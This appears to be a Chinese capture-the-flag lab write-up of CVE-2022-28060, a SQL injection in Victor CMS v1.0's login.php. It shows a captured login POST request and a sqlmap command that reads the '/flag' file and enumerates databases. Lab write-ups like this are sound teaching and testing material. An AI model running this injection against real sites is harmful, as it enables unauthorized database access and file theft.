CVE-2022-28060
一、漏洞介绍
Victor CMS v1.0 /includes/login.php 存在sql注入
二、渗透步骤
1、打开网站
http://eci-2ze1p8ih20adgtxdbsub.cloudeci1.ichunqiu.com/
2、截取数据包
POST /includes/login.php HTTP/1.1
Host: eci-2ze1adb7kfvtk2xplkay.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://eci-2ze1adb7kfvtk2xplkay.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze1adb7kfvtk2xplkay.cloudeci1.ichunqiu.com/
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1686125034,1686301526,1686398021,1686476404; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1686480224; PHPSESSID=pvbd75gserhp1ue4ne3cuq3q54
Upgrade-Insecure-Requests: 1
user_name=admin&user_password=admin&login=
3、SQL注入
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt --file-read "/flag" --dbs --batch